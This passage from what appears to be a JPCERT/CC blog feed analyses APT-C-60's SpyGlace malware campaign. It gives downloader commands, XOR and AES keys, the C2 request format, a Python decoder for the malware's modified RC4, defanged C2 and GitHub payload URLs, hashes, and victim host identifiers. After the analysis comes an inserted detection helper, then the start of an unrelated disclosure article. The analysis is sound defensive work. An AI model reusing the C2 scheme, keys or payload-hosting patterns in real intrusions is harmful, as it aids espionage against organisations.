requests.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>https://raw.githubusercontent.com/carolab989/class2025/refs/heads/main/[VolumeSerialNumber + ComputerName].txt</pre> <p>When the attacker checks the Referer values sent to statcounter and uploads the <strong>"[VolumeSerialNumber + ComputerName].txt"</strong> corresponding to that host to GitHub, Downloader1 retrieves the file. The URL written in the retrieved file is then used to download and execute the next stage, Downloader2. Furthermore, <strong>"[VolumeSerialNumber + ComputerName].txt"</strong> can not only specify the download URL but also issue the commands listed in Table 1. For example, <strong>"1*"</strong> changes the interval of GET requests to statcounter.com from the default of 1 hour to 6 hours, suggesting that the attacker intends to check the victim environment more cautiously.</p> <div style="text-align: center;"> Table 1: Downloader commands </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>"1*"</td> <td>Change the interval settings</td> </tr> <tr> <td>"0*" or "40*"</td> <td>Reset the interval settings</td> </tr> <tr> <td>"http*"</td> <td>Download DLL</td> </tr> </tbody> </table> <p>As in the previous version, the retrieved file is XOR-decoded with the key <strong>"sgznqhtgnghvmzxponum"</strong> before being executed.</p> <p>Downloader2 downloads and executes SpyGlace and its loader. Its dynamic API resolution uses an encoding scheme based on ADD and XOR, but the values have changed from the previous version: it now performs <strong>add 0x04</strong> followed by <strong>XOR 0x05</strong>. The SpyGlace loader uses the same encoding scheme. As in the previous version, the file retrieved by Downloader2 is XOR-decoded with the key <strong>"AadDDRTaSPtyAG57er#$ad!lDKTOPLTEL78pE"</strong> and then executed via COM hijacking.</p> <h3>SpyGlace updates</h3> <p>JPCERT/CC has identified three versions of SpyGlace: <strong>Version 3.1.12, 3.1.13 and 3.1.14</strong>. Compared with Version 3.1.6 observed in 2024, the commands <strong>prockill</strong> and <strong>proclist</strong> have been changed to do nothing, and a new command, <strong>uld</strong>, has been added. The uld command calls a specific function of a loaded module and then unloads the module two seconds later; this is presumably needed for modules that require a specific function to be executed before they are unloaded. We also confirmed that in the screenupload command, the file path and export function name of what appears to be a screenshot-related module have changed to those shown below. We have not obtained the module <strong>Clouds.db</strong> itself, so its functionality is unknown, but it is presumably a module related to the screenshot command. See Appendix D for the full list of implemented commands.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>File path: %LocalAppData%\Microsoft\Windows\Clouds\Clouds.db
Export Function: mssc1</pre> <p>There are almost no differences among Versions 3.1.12, 3.1.13 and 3.1.14, apart from each using a different Mutex value, and the autorun path, previously <strong>%public%\AccountPictures\Default\</strong>, having changed to <strong>%appdata%\Microsoft\SystemCertificates\My\CPLs</strong> from Version 3.1.14 onward.</p> <p>An article <a href="#1">[1]</a> describing a campaign that used Version 3.1.14 was published in September 2025, but since the GitHub repositories used do not overlap, it is presumably a separate campaign observed outside Japan.</p> <h3>Details of SpyGlace's encoding function and communication method</h3> <p>SpyGlace's characteristic encoding scheme combines a one-byte XOR with a SUB instruction and is used extensively for the strings the malware uses and for dynamic API resolution. SpyGlace's <strong>"Download"</strong> command downloads an encrypted file; we confirmed that it is decrypted with <strong>AES128-CBC</strong> using the following KEY and IV and written to <strong>%temp%\wcts66889.tmp</strong>. Part of the download command's code is shown in Figure 2.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>KEY: B0747C82C23359D1342B47A669796989
IV: 21A44712685A8BA42985783B67883999</pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update02-800wri.png" width="800" height="598" alt="" class="asset asset-image at-xid-3905241 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 2: Part of the download command's code </div> <p><br></p> <p>SpyGlace uses BASE64 and RC4 for communication with the C2 server; the request header format of its initial communication is shown below. The string <strong>"GOLDBAR"</strong> used as the userid in the a001 value is identical to the string reported by Positive Technologies <a href="#2">[2]</a> and to the one used in last year's attacks in Japan, and may indicate the target region or campaign. As for the encoding scheme, SpyGlace since at least Version 3.1.6 uses a modified <strong>RC4</strong>.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>a001=[md5("GOLDBAR")]&a002=[md5(systeminfo)]&a003=["uid" or "info"]&a004=[BASE64(CustomRC4([ComputerName;UserName;CpuInfo;OS Version;SpyGlace Version]))]</pre> <p>The modified RC4 differs from standard RC4 in that it runs the KSA for additional cycles and adds values into the XOR keystream, among other changes; it can be decoded with the following Python script.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>import base64

def CustomRC4(key: bytes, data: bytes) -> bytes:
    # --- KSA ---
    S = list(range(256))
    n = 3
    for round in range(n):
        j = 0
        keylen = len(key)
        if keylen == 0:
            raise ValueError("key must be non-empty")
        for i in range(256):
            j = (j + S[i] + key[i % keylen]) & 0xFF
            S[i], S[j] = S[j], S[i]
    # --- PRGA ---
    i = j = 0
    out = []
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        k = S[(S[i] + j) & 0xFF]
        S[i], S[j] = S[j], S[i]
        k2 = S[((S[((i >> 3) ^ (0x20 * j)) & 0xFF] + S[((0x20 * i) ^ (j >> 3)) & 0xFF]) ^ 0xAA) & 0xFF] + S[(S[j] + S[i]) & 0xFF]
        out.append((b ^ k ^ k2) & 0xFF)
    return bytes(out)

def decode(base64in):
    key = b"90b149c69b149c4b99c04d1dc9b940b9"
    decoded = CustomRC4(key, base64.b64decode(base64in))
    print("Result: ", decoded)</pre> <h3>Decoy documents used</h3> <p>Figure 3 shows part of a decoy document used in these attacks. Because recruiting staff are the targets, the résumé presents a background as a researcher and lists several papers, but the sender's name does not appear among the authors of those papers. The name in the résumé roughly matches the Gmail account name of the email sender, so the attacker may have created the account specifically for this attack.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update03-800wri.png" width="800" height="1034" alt="" class="asset asset-image at-xid-3905242 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 3: Part of a decoy document used </div> <p><br></p> <h3>Analysis of the GitHub repositories</h3> <p>Because the attacker uses GitHub to distribute payloads, every payload distributed in the past can be retrieved as long as the repository is not deleted. Table 2 shows each uploaded SpyGlace version and when it was uploaded.</p> <div style="text-align: center;"> Table 2: Date and time each version was uploaded to GitHub </div> <table> <thead> <tr> <th>SpyGlace Version</th> <th>Upload Date &amp; Time</th> </tr> </thead> <tbody> <tr> <td>Version 3.1.12</td> <td>Fri Jun 27 14:33:28 2025 +0900</td> </tr> <tr> <td>Version 3.1.13</td> <td>Thu Jul 3 18:25:18 2025 +0900</td> </tr> <tr> <td>Version 3.1.14</td> <td>Wed Jul 16 15:03:52 2025 +0900</td> </tr> </tbody> </table> <p>We also identified the email addresses recorded in the commit log of the attacker-controlled GitHub repository, as well as infected-host information consisting of <strong>volume serial numbers</strong> and <strong>computer names</strong>. These are listed for reference in Appendix E and Appendix F respectively.</p> <h2>Conclusion</h2> <p>As in the past, APT-C-60's attacks are concentrated on East Asia, including Japan. Although some changes can be seen, such as the infrastructure moving from Bitbucket to GitHub and updates to the malware, much remains the same, including the use of legitimate services and the malware's behavior, so continued vigilance in light of these past trends is needed. The malware's communication destinations and hash values are listed in the Appendix; note that the communication destinations include legitimate services.</p> <p style="text-align: right">Incident Response Group, Yuma Masubuchi</p> <h4>References</h4> <p><a name="1"></a>[1] Sangfor, [Advanced Threat Tracking (APT)] In-depth analysis of the encrypted payloads in the "Pseudo Hunter" group's GitHub repository <a href="https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A" target="_blank"><br>https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A</a></p> <p><a name="2"></a>[2] Positive Technologies DarkHotel. 
A cluster of groups united by common techniques <a href="https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/" target="_blank"><br>https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/</a></p> <h4>Appendix A: IoC Network</h4> <ul> <li>https[:]//c.statcounter[.]com/13139439/0/1ba1a548/1/</li> <li>https[:]//raw.githubusercontent[.]com/carolab989/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/football2025/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/fenchiuwu/class2025/refs/heads/main/</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datapages.txt</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datautils.txt</li> <li>https[:]//bitbucket[.]org/clouds999/glo29839/downloads/</li> <li>https[:]//raw.githubusercontent[.]com/goldbars33/ozbdkak33/refs/heads/main/</li> <li>https[:]//185.181.230[.]71/wkdo9/4b3ru.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/t1802.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/n3tb4.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/2qpmk.asp</li> </ul> <h4>Appendix B: IoC File</h4> <div style="text-align: center;"> Table 3: File list </div> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 20%;"> <col style="width: 20%;"> <col style="width: 60%;"> </colgroup> <thead> <tr> <th>Content</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV &amp; Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">f42d0fa77e5101f0f793e055cb963b45b36536b1835b9ea8864b4283b21bb68f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: 
break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">25f81709d914a0981716e1afba6b8b5b3163602037d466a02bc1ec97cdc2063b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic60.ds</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic400.ds</td> <td style="word-wrap: break-word; white-space: normal;">a80848cf7d42e444b7ec1161c479b1d51167893f47d202b05f590ad24bf47942</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic900.ds</td> <td style="word-wrap: break-word; white-space: normal;">1e931c8aa00b7f2b3adedc5260a3b69d1ac914fe1c022db072ed45d7b2dddf6c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">glog.txt</td> <td style="word-wrap: break-word; white-space: normal;">c9c6960a5e6f44afda4cc01ff192d84d59c4b31f304d2aeba0ef01ae04ca7df3</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">WebClassUser.dat</td> <td style="word-wrap: break-word; white-space: normal;">f102d490ad02b1588b9b76664cd715c315eaab33ac22b5d0812c092676242b15</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">57a77d8d21ef6a3458763293dbe3130dae2615a5de75cbbdf17bc61785ee79da</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td 
style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">9e30df1844300032931e569b256f1a8a906a46c6a7efa960d95142d6bea05941</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">git.exe(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">gcmd.exe</td> <td style="word-wrap: break-word; white-space: normal;">96312254d33241ce276afc7d7e0c7da648ffe33f3b91b6e4a1810f0086df3dba</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.12</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">669c268e4e1ced22113e5561a7d414a76fcd247189ed87a8f89fbbd61520966a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.13</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">f96557e8d714aa9bac8c3f112294bac28ebc81ea52775c4b8604352bbb8986b8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.14</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">8b51939700c65f3cb7ccdc5ef63dba6ca5953ab5d3c255ce3ceb657e7f5bfae8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">d535837fe4e5302f73b781173346fc9031d60019ea65a0e1e92e20e399a2f387</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">6d8a935f11665850c45f53dc1a3fc0b4ac9629211bd4281a4ec4343f8fa02004</td> </tr> <tr> <td style="word-wrap: 
break-word; white-space: normal;">Downloader2</td> <td style="word-wrap: break-word; white-space: normal;">coninst3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">d287dc5264fd504b016ec7e424650e2b353946cbf14d3b285ca37d78a6fda6f4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constart3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">10278a46b13797269fd79a5f8f0bc14ff1cc5bc0ea87cdd1bbc8670c464a3cf1</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">ingredient.txt</td> <td style="word-wrap: break-word; white-space: normal;">156df8c8bea005bd7dc49eb7aca230ef85ada1c092e45bb3d69913d78c4fa1f9</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Script</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">7ae86f2cb0bbe344b3102d22ecfcdda889608e103e69ec92932b437674ad5d2f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Script</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">e8b3b14a998ce3640a985b4559c90c31a5d7465bc5be5c6962e487172d3c9094</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">intersection.txt</td> <td style="word-wrap: break-word; white-space: normal;">09fcc1dfe973a4dc91582d7a23265c0fd8fc2a011adb2528887c1e1d3a89075a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">opinsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">048b69386410b8b7ddb7835721de0cba5945ee026a9134d425e0ba0662d9aee4</td> </tr> <tr> <td style="word-wrap: 
break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constafile.dat</td> <td style="word-wrap: break-word; white-space: normal;">f495171e7a10fb0b45d28a5260782a8c1f7080bd1173af405476e8d3b11b21b6</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">coninsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">8ea32792c1624a928e60334b715d11262ed2975fe921c5de7f4fac89f8bb2de5</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV &amp; Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">94ccdaf238a42fcc3af9ed1cae1358c05c04a8fa77011331d75825c8ac16ffd8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">volumelog.txt</td> <td style="word-wrap: break-word; white-space: normal;">299d792c8d0d38d13af68a2467186b2f47a1834c6f2041666adafc626149edaf</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol60.dot</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol400.dot</td> <td style="word-wrap: break-word; white-space: normal;">94f6406a0f40fb8d84ceafaf831f20482700ee1a92f6bca1f769dff98896245c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol900.dot</td> <td style="word-wrap: break-word; white-space: 
normal;">45c1c79064cef01b85f0a62dac368e870e8ac3023bfbb772ec6d226993dc0f87</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">UsrClassCache.dat</td> <td style="word-wrap: break-word; white-space: normal;">50b40556aa7461566661d6a8b9486e5829680951b5df5b7584e0ab58f8a7e92f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">5da82fa87b0073de56f2b20169fa4d6ea610ed9c079def6990f4878d020c9d95</td> </tr> </tbody> </table> <h4>Appendix C: IoC Other</h4> <div style="text-align: center;"> Table 4: Other IoCs </div> <table> <thead> <tr> <th>Content</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A90B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79AD7B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A44A</td> </tr> <tr> <td>CLASSID</td> <td>{566296fe-e0e8-475f-ba9c-a31ad31620b1}</td> </tr> <tr> <td>CLASSID</td> <td>{64B8F404-A4AE-11D1-B7B6-00C04FB926AF}</td> </tr> <tr> <td>File path</td> <td>%userprofile%\AppData\Local\Microsoft\Windows\WebClassUser.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\WebCache\WebCacheR.tmp.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\GameList.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\DataCache.dat</td> </tr> <tr> <td>File path</td> <td>%temp%\wcts66889.tmp</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassLib.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Config.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\Local\Microsoft\Windows\UsrClassCache.dat</td> 
</tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Cache.dat</td> </tr> </tbody> </table> <h4>Appendix D: Commands</h4> <div style="text-align: center;"> Table 5: SpyGlace command list </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>turn on</td> <td>Change the interval settings</td> </tr> <tr> <td>turn off</td> <td>Reset the interval settings</td> </tr> <tr> <td>cd</td> <td>Change directory</td> </tr> <tr> <td>ddir</td> <td>List of the files in the directory</td> </tr> <tr> <td>ddel</td> <td>Delete file and directory</td> </tr> <tr> <td>ld</td> <td>Load module</td> </tr> <tr> <td>uld</td> <td>Unload module</td> </tr> <tr> <td>attach</td> <td>Start module</td> </tr> <tr> <td>detach</td> <td>Stop module</td> </tr> <tr> <td>procspawn</td> <td>Start process</td> </tr> <tr> <td>prockill</td> <td>None</td> </tr> <tr> <td>proclist</td> <td>None</td> </tr> <tr> <td>diskinfo</td> <td>Get disk information</td> </tr> <tr> <td>download</td> <td>Download encrypted file</td> </tr> <tr> <td>downfree</td> <td>Download file</td> </tr> <tr> <td>cancel</td> <td>Remote shell</td> </tr> <tr> <td>screenupload</td> <td>Upload screenshot</td> </tr> <tr> <td>screenauto</td> <td>Upload screenshot automatically</td> </tr> <tr> <td>upload</td> <td>Upload file</td> </tr> </tbody> </table> <h4>Appendix E: Email addresses used for the commits</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>kithatart@outlook.com
magnolia099@163.com
carolab989@proton.me
fenchiuwu@proton.me
Ridgley223870@proton.me</pre> <h4>Appendix F: Victimized devices identified from the GitHub repository</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>1014988494f04da28046ba
1020301627MBE4OSU
2096821130DESKTOP-BN9A2SA
2958455713DESKTOP-NKVAKV1
4205732935****** (masked because it may contain a personal name)
3761538073DESKTOP-PVKDUAM
3537034124JKS
3472318429****** (masked because it may contain a personal name)
1620260207DESKTOP-6LO36DE
1347261043DESKTOP-0V7K7HA
2352730816DESKTOP-4QC5J5Q
3362573326DESKTOP-43R2GH0</pre>
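The Downloader1 section of the post above gives defenders two concrete things to look for: the distinctive `Referer` the implant sends to statcounter, and the small command vocabulary of Table 1 that the attacker places in the per-host `[VolumeSerialNumber + ComputerName].txt` file. The following is an added example written for this page (it is not JPCERT/CC's code and not part of the original post): a Python triage helper that flags that beacon format in constructed proxy log lines, splits the identifier into serial number and computer name, classifies the contents of a retrieved command file per Table 1, and applies the repeating-key XOR the post describes for retrieved payloads. Assumptions made here and not stated in the post: the identifier is a 10-digit decimal serial followed directly by the computer name (as the Appendix F entries suggest), the proxy log is a simple `key=value` format with the Referer in double quotes, and the `1111,2222` numbers in the sample are placeholders for the post's `[Number1],[Number2]`.

```python
import re

# Referer format of the Downloader1 beacon to statcounter, as given in the post:
#   Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName]
BEACON_RE = re.compile(
    r"ONLINE=>(?P<number1>[^,]+),(?P<number2>\S+) >> (?P<profile>.+?) / (?P<ident>\S+)$"
)
# Assumption: a 10-digit decimal volume serial number directly followed by the
# computer name, as the Appendix F entries (e.g. 2096821130DESKTOP-BN9A2SA) suggest.
IDENT_RE = re.compile(r"^(?P<serial>\d{10})(?P<host>.+)$")

# XOR key the post reports for files retrieved by Downloader1.
XOR_KEY_DOWNLOADER1 = b"sgznqhtgnghvmzxponum"


def parse_beacon_referer(referer):
    """Return the fields of a Downloader1-style Referer, or None if it does not match."""
    m = BEACON_RE.search(referer)
    if not m:
        return None
    ident = m.group("ident")
    im = IDENT_RE.match(ident)
    return {
        "number1": m.group("number1"),
        "number2": m.group("number2"),
        "profile": m.group("profile"),
        "ident": ident,
        "volume_serial": im.group("serial") if im else None,
        "computer_name": im.group("host") if im else None,
    }


def classify_command(text):
    """Classify the contents of a retrieved [VolumeSerialNumber + ComputerName].txt per Table 1."""
    t = text.strip()
    if t == "1*":
        return ("change_interval", None)   # statcounter polling 1 h -> 6 h
    if t in ("0*", "40*"):
        return ("reset_interval", None)
    if t.startswith("http"):
        return ("download_dll", t)         # next-stage URL; the payload is XOR-encoded
    return ("unknown", t)


def xor_decode(data, key):
    """Repeating-key XOR, the decoding step the post describes for retrieved payloads."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed proxy log lines (not from a real environment). The identifier in the
# second line is one of the Appendix F entries; 1111/2222 are placeholder numbers.
SAMPLE_PROXY_LOG = [
    r'2025-07-01T09:00:01Z src=10.0.0.12 host=www.example.com referer="https://www.example.com/"',
    r'2025-07-01T09:00:07Z src=10.0.0.12 host=c.statcounter.com referer="ONLINE=>1111,2222 >> C:\Users\alice / 2096821130DESKTOP-BN9A2SA"',
    r'2025-07-01T09:00:09Z src=10.0.0.13 host=c.statcounter.com referer="https://blog.example.org/post/1"',
]


def scan_proxy_log(lines):
    """Flag log lines whose Referer follows the Downloader1 beacon format."""
    hits = []
    for line in lines:
        m = re.search(r'referer="([^"]*)"', line)
        if not m:
            continue
        fields = parse_beacon_referer(m.group(1))
        if fields:
            fields["line"] = line
            hits.append(fields)
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("Downloader1 beacon from", hit["computer_name"], "serial", hit["volume_serial"])
```

Matching on the Referer structure rather than on the statcounter hostname alone matters here: statcounter is a legitimate service, as the post's closing note points out, and the project URL in Appendix A will appear in plenty of benign traffic. The extracted serial and computer name can be compared directly against the Appendix F list when assessing whether a host appears in the attacker's repository.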
  49. Commentary: Operation of the Vulnerability Information Handling Framework and Future Challenges (Part 2) ~ Handling of Vulnerability Exploitation Information and Future Challenges ~

    Fri, 19 Sep 2025 02:30:00 -0000

    Introduction: In the first part of this article, we explained the "Information Security Early Warning Partnership" [1] framework...
<h4>Introduction</h4> <p>In the first part of this article, we explained so-called "coordinated vulnerability disclosure (CVD)" under the "Information Security Early Warning Partnership"<a href="#fn1">[1]</a> framework and introduced the activities carried out in normal times. In this second part, we introduce the response operations carried out when a vulnerability is already being exploited, or when the likelihood of exploitation is rising. Information about vulnerability exploitation, and in particular information about zero-day attacks before publication, is not something many organizations have experience handling. In addition to coordinating and publishing many vulnerabilities throughout the year, JPCERT/CC also handles exploitation information (circulating threat information in parallel with vulnerability coordination, issuing alerts, feeding information-sharing activities, cooperating with overseas organizations, and so on). Building on an explanation of these little-known operations, we also briefly consider some points of discussion for improving the framework in the future.</p>
<p>&lt;Notes for reading this article&gt;<br>・Unless otherwise specified, the "product in which a vulnerability was found" discussed in this article is assumed to be an enterprise product. The corresponding discussion for consumer products is omitted for reasons of space.<br>・For general points to note on handling vulnerability exploitation information, please refer to the "Guidance on Sharing and Publishing Information Related to Cyber Attack Damage" and the "Handbook on Handling and Utilizing Attack Technique Information".<br>・Because this article also covers cases outside the domestic framework, it uses the commonly used terms manufacturer/vendor rather than the term "product developer" used in the vulnerability notification standard.</p>
<h4>Decision factors when handling vulnerability exploitation information</h4> <hr> <p>When an attack campaign exploiting an unknown vulnerability comes to light, the decision factors in handling the exploitation information (coordination, information sharing, publication, etc.) are as shown in the figure below.</p>
<p><strong>Amount/accuracy of information:</strong><br>It is very rare that a victim organization can immediately confirm that "an unknown vulnerability was exploited"; this is confirmed only after investigation on the victim side and verification (over some period) on the manufacturer side.<br>If the information the manufacturer could obtain from victim organizations before vulnerability coordination and publication was limited, investigation results from victim organizations discovered after the publication or alert may reveal new information about the vulnerability, and in some cases additional vulnerabilities may be published or additional fixes released.</p>
<p><strong>Victim-side investigation/manufacturer-side verification:</strong><br>Accurately identifying the exploited vulnerability requires not only investigation on the victim side but also verification on the manufacturer side. This point is discussed later.</p>
<p><strong>Preparing countermeasures/contacting customers:</strong><br>On the manufacturer side, the work proceeds through identifying and verifying the vulnerability, preparing the remediation, contacting customers, and preparing for publication.<br>When an attack is ongoing and serious damage is spreading, depending on the situation, information may be disclosed (published or communicated to customers) without waiting for a fix, and provisional workarounds, damage-mitigation measures for already-compromised systems, or hotfixes may be provided.</p>
<p><strong>Publication/alerts/information sharing:</strong><br>For an explanation of the general decision factors in issuing alerts, please refer to the following article we published previously.</p> <p style="padding-left: 40px;">JPCERT/CC Eyes: On the "cost" problem on the receiving side of alerts and information-sharing activities: so that issuing information does not become a self-serving act done for alibi or for show<br>https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html</p>
<p>Indicator information for finding compromises, such as the malware and communication destinations used in attacks exploiting the vulnerability, is in some cases published with the alert and in other cases distributed through closed information-sharing activities; the means of communication, their combination, and their timing vary. As in the case of overseas products described later, there are cases where the number of users is so large that indicator information is published together with the alert, and there are cases where manufacturers or specialist organizations contact users individually and privately.</p>
